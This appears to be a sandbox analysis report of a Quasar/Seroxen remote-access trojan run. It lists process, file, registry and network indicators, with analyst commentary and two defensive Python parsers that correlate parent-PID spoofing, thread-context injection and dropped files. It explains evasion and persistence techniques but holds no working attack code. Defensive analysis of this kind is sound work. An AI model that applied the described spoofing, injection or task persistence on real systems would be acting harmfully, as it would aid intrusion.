Analysis
  max time kernel: 1050s
  max time network: 1049s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 01/01/2025, 23:41
Tasks
  Static task: static1
  URLScan task: urlscan1
  Behavioral task: behavioral1
    Sample: http://youtube.com
    Resource: win10v2004-20241007-en

General
  Target: http://youtube.com

The submitted target is a URL, but the behavioural signatures below are driven by a dropped executable, build.bat.exe, and the files it writes. Nothing in this extract records which process wrote build.bat.exe or how it came to run after the URL was visited, so the indicators to take from this report are the process chain, the dropped paths and the task name below, not the URL itself.
Malware Config
  Extracted: quasar
    reconnect_delay: 3000
Signatures

Quasar family

Quasar payload (1 IoC)
  resource | yara_rule
  behavioral1/memory/2396-811-0x0000023B62B90000-0x0000023B63306000-memory.dmp | family_quasar

The hit is a memory region dumped from PID 2396, which the "Executes dropped EXE" signature below identifies as $sxr-powershell.exe; the region spans 0x0000023B62B90000 to 0x0000023B63306000 (0x776000 bytes). The $sxr- file prefix and the $sxr-seroxen2 directory in the dropped paths further down are the naming used by Seroxen, a Quasar-derived RAT, which is consistent with the family_quasar match.
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 6560 created 6424 | 6560 | WerFault.exe | 174

Suspicious use of NtCreateUserProcessOtherParentProcess (11 IoCs)
  description | pid | Process | procid_target
  PID 700 created 612 | 700 | build.bat.exe | 5
  PID 2396 created 612 | 2396 | $sxr-powershell.exe | 5
  PID 2396 created 612 | 2396 | $sxr-powershell.exe | 5
  PID 700 created 612 | 700 | build.bat.exe | 5
  PID 700 created 612 | 700 | build.bat.exe | 5
  PID 4708 created 612 | 4708 | build.bat.exe | 5
  PID 6052 created 612 | 6052 | $sxr-powershell.exe | 5
  PID 6052 created 612 | 6052 | $sxr-powershell.exe | 5
  PID 4708 created 612 | 4708 | build.bat.exe | 5
  PID 4708 created 612 | 4708 | build.bat.exe | 5
  PID 6516 created 6424 | 6516 | svchost.exe | 174

In these two tables the pid column is the process that issued the create call and the number after "created" is the PID recorded as the new process's parent; procid_target is tria.ge's index for that parent. Every row from the sample's own processes (build.bat.exe as PIDs 700 and 4708, $sxr-powershell.exe as PIDs 2396 and 6052) names PID 612 as the parent, and index 5 places 612 among the processes that existed before the sample ran: this is parent-PID spoofing. Telemetry that reads the recorded parent, Sysmon Event ID 1 included, will show 612 as the parent of those children; catching the spoof needs a source that records the creating process separately from the declared parent, such as the Microsoft-Windows-Kernel-Process ETW provider, whose ProcessStart events carry the creator in the event header and the declared parent in the payload. The two rows naming 6424 are different: 6424 is a cmd.exe (see the Internet Connection Discovery signature below), and Windows Error Reporting starts WerFault.exe with the faulting process as its parent, so the svchost.exe and WerFault.exe rows are ordinary crash handling for that cmd.exe rather than evasion.
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | build.bat.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | build.bat.exe
Executes dropped EXE (6 IoCs)
  pid | Process
  700 | build.bat.exe
  2396 | $sxr-powershell.exe
  3832 | $sxr-powershell.exe
  4708 | build.bat.exe
  6052 | $sxr-powershell.exe
  1596 | $sxr-powershell.exe
Hide Artifacts: Hidden Window (1 TTP, 4 IoCs)
Windows that would typically be displayed when an application carries out an operation can be hidden.
  pid | Process
  3832 | $sxr-powershell.exe
  6052 | $sxr-powershell.exe
  1596 | $sxr-powershell.exe
  2396 | $sxr-powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow | ioc
  134 | camo.githubusercontent.com
  135 | raw.githubusercontent.com

Only the hostnames are recorded here; the fetched paths are not in this extract. Both hosts serve all of GitHub's raw and proxied content, so they are context for the network flows rather than blockable indicators on their own.
Drops file in System32 directory (26 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start | svchost.exe
  File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | build.bat.exe
  File opened for modification | C:\Windows\System32\vcruntime140d.dll | build.bat.exe
  File opened for modification | C:\Windows\System32\vcruntime140d.dll | build.bat.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | DllHost.exe
  File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
  File created | C:\Windows\System32\vcruntime140_1d.dll | build.bat.exe
  File opened for modification | C:\Windows\System32\ucrtbased.dll | $sxr-powershell.exe
  File opened for modification | C:\Windows\System32\Tasks\$sxr-lvHIFQdKtdAeoNrdloeg | svchost.exe
  File opened for modification | C:\Windows\System32\vcruntime140d.dll | $sxr-powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
  File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | svchost.exe
  File created | C:\Windows\System32\ucrtbased.dll | build.bat.exe
  File created | C:\Windows\System32\vcruntime140d.dll | build.bat.exe
  File opened for modification | C:\Windows\System32\vcruntime140d.dll | $sxr-powershell.exe
  File opened for modification | C:\Windows\System32\ucrtbased.dll | $sxr-powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
  File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | svchost.exe
  File opened for modification | C:\Windows\System32\ucrtbased.dll | build.bat.exe
  File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | $sxr-powershell.exe
  File opened for modification | C:\Windows\System32\ucrtbased.dll | build.bat.exe
  File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | build.bat.exe
  File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | $sxr-powershell.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | OfficeClickToRun.exe

Three of the written files, vcruntime140d.dll, vcruntime140_1d.dll and ucrtbased.dll, are the debug-configuration builds of the Visual C++ runtime and the Universal CRT. They do not ship with Windows, so a binary compiled in Debug configuration has to carry them along, which is why build.bat.exe creates them in System32 before $sxr-powershell.exe opens them. The task file C:\Windows\System32\Tasks\$sxr-lvHIFQdKtdAeoNrdloeg is written by svchost.exe because task registration goes through the Task Scheduler service; the task name, not the writing process, is the indicator. The remaining rows (the Microsoft\Windows\WindowsUpdate and UpdateOrchestrator task files, CryptnetUrlCache and WebCache) are routine Windows Update, certificate-cache and WebCache activity by Windows components.
Suspicious use of SetThreadContext (10 IoCs)
  description | pid | Process | procid_target
  PID 700 set thread context of 2744 | 700 | build.bat.exe | 136
  PID 2396 set thread context of 4648 | 2396 | $sxr-powershell.exe | 138
  PID 2396 set thread context of 2408 | 2396 | $sxr-powershell.exe | 140
  PID 700 set thread context of 5716 | 700 | build.bat.exe | 142
  PID 700 set thread context of 5456 | 700 | build.bat.exe | 143
  PID 4708 set thread context of 5416 | 4708 | build.bat.exe | 158
  PID 6052 set thread context of 2716 | 6052 | $sxr-powershell.exe | 160
  PID 6052 set thread context of 5356 | 6052 | $sxr-powershell.exe | 162
  PID 4708 set thread context of 432 | 4708 | build.bat.exe | 168
  PID 4708 set thread context of 5736 | 4708 | build.bat.exe | 173

Setting the thread context of another process is the step that redirects execution after a payload has been written into it (process hollowing and similar injection). The four injectors here, PIDs 700, 2396, 4708 and 6052, are the same four processes that spoof their children's parent in the NtCreateUserProcessOtherParentProcess signature above.
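As an added triage helper, not part of the tria.ge report or of any tool it describes, the following Python parses the two OtherParentProcess tables and the SetThreadContext table above, together with the Quasar memory-dump name, into structured records; it separates the Windows Error Reporting rows from the sample's own parent spoofing and checks whether the PID that holds the Quasar payload is also a spoofer and an injector. The row strings are copied from this report. The column reading (first number is the process acting, second number is the declared parent or the injection target, last number is tria.ge's process index) and the treatment of svchost.exe/WerFault.exe rows as WER noise are the editor's assumptions.

```python
import re
from collections import defaultdict

# Rows copied verbatim from the two "OtherParentProcess" tables and the
# SetThreadContext table of this report (description, pid, Process,
# procid_target flattened into one line per row).
OTHER_PARENT_ROWS = """\
PID 700 created 612 700 build.bat.exe 5
PID 2396 created 612 2396 $sxr-powershell.exe 5
PID 2396 created 612 2396 $sxr-powershell.exe 5
PID 700 created 612 700 build.bat.exe 5
PID 700 created 612 700 build.bat.exe 5
PID 4708 created 612 4708 build.bat.exe 5
PID 6052 created 612 6052 $sxr-powershell.exe 5
PID 6052 created 612 6052 $sxr-powershell.exe 5
PID 4708 created 612 4708 build.bat.exe 5
PID 4708 created 612 4708 build.bat.exe 5
PID 6516 created 6424 6516 svchost.exe 174
PID 6560 created 6424 6560 WerFault.exe 174"""

THREAD_CONTEXT_ROWS = """\
PID 700 set thread context of 2744 700 build.bat.exe 136
PID 2396 set thread context of 4648 2396 $sxr-powershell.exe 138
PID 2396 set thread context of 2408 2396 $sxr-powershell.exe 140
PID 700 set thread context of 5716 700 build.bat.exe 142
PID 700 set thread context of 5456 700 build.bat.exe 143
PID 4708 set thread context of 5416 4708 build.bat.exe 158
PID 6052 set thread context of 2716 6052 $sxr-powershell.exe 160
PID 6052 set thread context of 5356 6052 $sxr-powershell.exe 162
PID 4708 set thread context of 432 4708 build.bat.exe 168
PID 4708 set thread context of 5736 4708 build.bat.exe 173"""

# The "Quasar payload" YARA hit, copied from the report.
QUASAR_HIT = "behavioral1/memory/2396-811-0x0000023B62B90000-0x0000023B63306000-memory.dmp"

# Assumption: Windows Error Reporting starts WerFault.exe with the faulting
# process as its parent, so rows acted by the WER service host or by WerFault
# are expected and are kept apart from the sample's spoofing.
WER_IMAGES = {"svchost.exe", "werfault.exe"}

# Assumed column reading: "PID <actor> <verb> <target> <actor> <image> <target_idx>".
ROW_RE = re.compile(
    r"^PID (?P<actor>\d+) (?P<verb>created|set thread context of) (?P<target>\d+) "
    r"(?P=actor) (?P<image>\S+) (?P<target_idx>\d+)$")
DUMP_RE = re.compile(
    r"(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")


def parse_rows(text):
    """Turn flattened tria.ge rows into dicts; refuse any line that does not match."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        rows.append({"actor": int(m["actor"]), "image": m["image"], "verb": m["verb"],
                     "target": int(m["target"]), "target_idx": int(m["target_idx"])})
    return rows


def parse_dump_name(name):
    """Split '<pid>-<seq>-0x<start>-0x<end>-memory.dmp' into pid and region bounds."""
    m = DUMP_RE.search(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name!r}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "start": start, "end": end, "size": end - start}


def triage(other_parent_text, thread_context_text, dump_name):
    """Correlate spoofed-parent creations, thread-context rewrites and the payload hit."""
    spoofed = defaultdict(set)     # declared parent pid -> pids that really did the creating
    wer_noise = []
    for r in parse_rows(other_parent_text):
        if r["image"].lower() in WER_IMAGES:
            wer_noise.append((r["actor"], r["target"]))
        else:
            spoofed[r["target"]].add(r["actor"])
    injections = defaultdict(set)  # injector pid -> pids whose thread context it rewrote
    for r in parse_rows(thread_context_text):
        injections[r["actor"]].add(r["target"])
    hit = parse_dump_name(dump_name)
    pid = hit["pid"]
    return {
        "payload_pid": pid,
        "payload_region_bytes": hit["size"],
        "spoofed_parents": {p: sorted(c) for p, c in spoofed.items()},
        "injections": {p: sorted(t) for p, t in injections.items()},
        "wer_noise": wer_noise,
        # Pivot points: does the process holding the payload also spoof and inject?
        "payload_pid_pivots": {
            "spoofed_parent": any(pid in c for c in spoofed.values()),
            "injected_into": sorted(injections.get(pid, ())),
        },
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(OTHER_PARENT_ROWS, THREAD_CONTEXT_ROWS, QUASAR_HIT), indent=2))
```

Run as a script it prints the correlation as JSON: one declared parent (612) shared by four real creators, the two WER rows set aside, and PID 2396 flagged as both a spoofer and the process that rewrote the thread context of PIDs 2408 and 4648, so those two are the next memory regions to pull from the sandbox.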
Drops file in Windows directory (9 IoCs)
  description | ioc | Process
  File created | C:\Windows\$sxr-powershell.exe | build.bat.exe
  File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
  File created | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
  File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
  File created | C:\Windows\$sxr-powershell.exe | build.bat.exe
  File opened for modification | C:\Windows\$sxr-powershell.exe | build.bat.exe
  File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
  File opened for modification | C:\Windows\$sxr-powershell.exe | build.bat.exe
  File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | svchost.exe
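An added hunting helper, not part of the report, for the file-write rows in the two "Drops file" tables above. It classifies writes by path rather than by writing process, because the persistence artefact, C:\Windows\System32\Tasks\$sxr-lvHIFQdKtdAeoNrdloeg, is written by svchost.exe on behalf of the Task Scheduler service and would be lost to any filter that trusts Windows binaries. The row subset is copied from this report; the list of "noise" prefixes and the filename pattern for debug CRT DLLs are the editor's assumptions about what is routine.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# A representative subset of rows copied verbatim from the "Drops file in
# System32 directory" and "Drops file in Windows directory" tables of this
# report (description, ioc, Process flattened into one line per row).
FILE_ROWS = r"""
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe
File created C:\Windows\System32\vcruntime140_1d.dll build.bat.exe
File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe
File created C:\Windows\System32\ucrtbased.dll build.bat.exe
File opened for modification C:\Windows\System32\Tasks\$sxr-lvHIFQdKtdAeoNrdloeg svchost.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe
File created C:\Windows\$sxr-powershell.exe build.bat.exe
File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
""".strip()

# The path may contain spaces ("Scheduled Start"); the writer is the last token.
ROW_RE = re.compile(r"^File (?P<op>created|opened for modification) (?P<path>.+) (?P<writer>\S+)$")

WINDOWS = PureWindowsPath(r"C:\Windows")
SYSTEM32 = WINDOWS / "System32"
TASKS = SYSTEM32 / "Tasks"
# Assumption: locations Windows components churn constantly; writes here are background noise.
NOISE_PREFIXES = (SYSTEM32 / "config" / "systemprofile",
                  WINDOWS / "SoftwareDistribution",
                  TASKS / "Microsoft")
# Assumption: debug builds of the VC++ runtime and Universal CRT carry a trailing "d"
# and are not shipped with Windows.
DEBUG_CRT = re.compile(r"^(vcruntime\d+(_\d+)?d|ucrtbased)\.dll$", re.IGNORECASE)


def is_under(path, prefix):
    # PureWindowsPath compares case-insensitively, so "system32" matches "System32".
    try:
        path.relative_to(prefix)
        return True
    except ValueError:
        return False


def classify(path_str):
    """Return a finding category for a path under %SystemRoot%, or None if it is noise."""
    p = PureWindowsPath(path_str)
    if any(is_under(p, n) for n in NOISE_PREFIXES):
        return None
    if is_under(p, TASKS):
        return "non-microsoft scheduled task"      # persistence candidate; writer is the Schedule service
    if is_under(p, SYSTEM32) and DEBUG_CRT.match(p.name):
        return "debug CRT dropped into System32"    # dependency carried in by a Debug-built payload
    if is_under(p, WINDOWS):
        return "file dropped under C:\\Windows"
    return None


def hunt(rows_text):
    """Group flagged paths by category, recording every process seen writing each path."""
    findings = defaultdict(lambda: defaultdict(set))
    for line in rows_text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        category = classify(m["path"])
        if category:
            findings[category][m["path"]].add(m["writer"])
    return {c: {p: sorted(w) for p, w in paths.items()} for c, paths in findings.items()}


def task_names(findings):
    """Names of the non-Microsoft task files, i.e. what to look for in Task Scheduler."""
    return sorted(PureWindowsPath(p).name for p in findings.get("non-microsoft scheduled task", {}))


if __name__ == "__main__":
    result = hunt(FILE_ROWS)
    for category, paths in result.items():
        print(category)
        for path, writers in paths.items():
            print(f"  {path}  (written by: {', '.join(writers)})")
    print("task names:", task_names(result))
```

The noise rows (Windows Update task files, CryptnetUrlCache, WebCache, SoftwareDistribution) drop out, and what remains is the hunt list for this run: the task name, the three debug CRT DLLs in System32, and the two $sxr- files under C:\Windows together with the processes that wrote them.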
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 3 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
  pid | Process
  1924 | cmd.exe
  6056 | PING.EXE
  6424 | cmd.exe
Checks processor information in registry (2 TTPs, 7 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | mousocoreworker.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | mousocoreworker.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe

Both readers, WerFault.exe and mousocoreworker.exe, are Windows components; none of the sample's processes appear here, so this run gives no evidence of sandbox detection by the sample itself.
Enumerates system info in registry (2 TTPs, 7 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

As with the processor checks, every reader (WerFault.exe, mousocoreworker.exe, msedge.exe) is a Windows or browser component rather than a sample process.
Kills process with taskkill (1 IoC)
  pid | Process
  5672 | taskkill.exe
(Signature name not captured in this page extract; the rows below are its IoC table.)
  description | ioc | Process
  Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | Explorer.EXE
  Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | Explorer.EXE
  Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | Explorer.EXE
  Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 | svchost.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f | svchost.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Toolbar | Explorer.EXE

The writers are Explorer.EXE and svchost.exe only; none of the sample's processes appear in this table.
Modifies data under HKEY_USERS (64 IoCs)
  Abbreviations used in this table: DEF = \REGISTRY\USER\.DEFAULT; MUI = DEF\Software\Classes\Local Settings\MuiCache\26\52C64B7E; CACHED = DEF\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached; OFFICE16 = C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16
  description | ioc | Process
  Set value (str) | MUI\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration" | SearchIndexer.exe
  Set value (str) | MUI\C:\Windows\system32,@elscore.dll,-1 = "Microsoft Language Detection" | SearchIndexer.exe
  Key created | DEF\Software\Microsoft\ActiveMovie | SearchFilterHost.exe
  Key created | DEF\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
  Set value (str) | MUI\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device | SearchFilterHost.exe
  Set value (str) | MUI\@C:\Windows\System32\acppage.dll,-6002 = "Windows Batch File" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion | SearchFilterHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-123 = "Microsoft Word Document" | SearchProtocolHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-174 = "Microsoft PowerPoint Presentation" | SearchProtocolHost.exe
  Key created | DEF\SOFTWARE\Microsoft\MPEG2Demultiplexer | SearchFilterHost.exe
  Set value (str) | MUI\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration" | SearchIndexer.exe
  Set value (data) | CACHED\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000006521764da75cdb01 | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows | SearchFilterHost.exe
  Set value (str) | MUI\@windows.storage.dll,-21824 = "Camera Roll" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\System32\setupapi.dll,-2000 = "Setup Information" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
  Set value (data) | CACHED\{E46787A1-4629-4423-A693-BE1F003B2742} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000005d530655a75cdb01 | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\system32\unregmp2.exe,-9923 = "Windows Media playlist" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList | SearchProtocolHost.exe
  Set value (str) | MUI\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration" | SearchIndexer.exe
  Set value (str) | MUI\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts" | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\SystemCertificates\My | SearchFilterHost.exe
  Key deleted | DEF\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Set value (str) | MUI\C:\Windows\system32,@elscore.dll,-9 = "Microsoft Bengali to Latin Transliteration" | SearchIndexer.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip" | SearchProtocolHost.exe
  Key deleted | DEF\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
  Set value (str) | MUI\C:\Windows\system32,@elscore.dll,-4 = "Microsoft Simplified Chinese to Traditional Chinese Transliteration" | SearchIndexer.exe
  Set value (str) | MUI\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document" | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video" | SearchProtocolHost.exe
  Set value (str) | MUI\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection" | SearchIndexer.exe
  Key created | DEF\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
  Key created | DEF\Software\Microsoft | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\system32\notepad.exe,-469 = "Text Document" | SearchProtocolHost.exe
  Key created | DEF\SOFTWARE | SearchFilterHost.exe
  Set value (str) | MUI\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-103 = "Windows PowerShell Script" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithList | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
  Set value (str) | DEF\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithList | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion | SearchProtocolHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-102 = "Microsoft Excel Template" | SearchProtocolHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-127 = "OpenDocument Text" | SearchProtocolHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation" | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures" | SearchProtocolHost.exe
  Key created | CACHED | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts | SearchProtocolHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-120 = "Microsoft Word 97 - 2003 Document" | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document" | SearchProtocolHost.exe
